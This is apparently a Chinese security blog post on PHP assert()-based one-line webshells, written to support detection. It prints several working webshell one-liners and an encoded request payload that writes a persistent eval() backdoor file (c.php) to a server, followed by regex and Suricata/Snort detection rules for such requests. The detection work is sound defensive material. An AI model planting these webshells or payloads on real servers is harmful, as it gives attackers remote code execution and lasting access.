PHP assert() webshell

引言

收集PHP一句话木马 assert() websell，并提供相应的检测方法。

案例

1、<?php $_GET['a']($_GET['b']);?>

<?php $_POST['a']($_GET['b']);?>
<?php $_POST['a']($_POST['b']);?>
<?php $_GET['a']($_POST['b']);?>

?a=assert&b=phpinfo()
?a=assert&b=${fputs%28fopen%28base64_decode%28Yy5waHA%29,w%29,base64_decode%28PD9waHAgQGV2YWwoJF9QT1NUW2NdKTsgPz4x%29%29};
解码后：a=assert&b=${fputs(fopen(base64_decode(Yy5waHA),w),base64_decode(PD9waHAgQGV2YWwoJF9QT1NUW2NdKTsgPz4x))};

Windows会提示警告错误，而且7.2以上禁用了一些动态函数。

Linux 不管成功还是失败无任何返回

正则匹配

pcre:"/GET\x20(\/[a-zA-Z0-9%_\/\-~]*)?\.php[\S]*=assert[^a-z][\s\S]*HTTP\/\d\.\d\x20200/i"   Webshell.Assert.Http_Request.A

pcre:"/POST\x20(\/[a-zA-Z0-9%_\/\-~]*)?\.php[\S\s]*\x0d\x0a[\S]*=assert[h\s&][\s\S]*HTTP\/\d\.\d\x20200/i"  Webshell.Assert.Http_Body.A

alert http any any -> any any (msg:"WebShell.PHP.Assert().Threat.A"; flow:to_server,established; content:"GET"; nocase; http_method; content:".php?"; nocase; http_uri; content:"=assert"; http_uri; fast_pattern; nocase; pcre:"/\.php\?[\S\s]*=assert[^a-z]/Ui"; reference:url,https://mp.csdn.net/mdeditor/88645526; classtype:web-application-attack; sid:70000000; rev:1; metadata:created_at 2019_03_19, updated_at 2019_03_19;)
alert http any any -> any any (msg:"WebShell.PHP.Assert().Threat.B"; flow:to_server,established; content:"POST"; nocase; http_method; content:".php"; nocase; http_uri; content:"=assert"; http_client_body; fast_pattern; nocase; pcre:"/=assert[&]?$/Pi"; reference:url,https://mp.csdn.net/mdeditor/88645526; classtype:web-application-attack; sid:70000001; rev:1; metadata:created_at 2019_03_19, updated_at 2019_03_19;)

文件："/2018 - Work/研究测试-2019/PHP/assert/1/assert_Windows-PHP-5.5.pcap"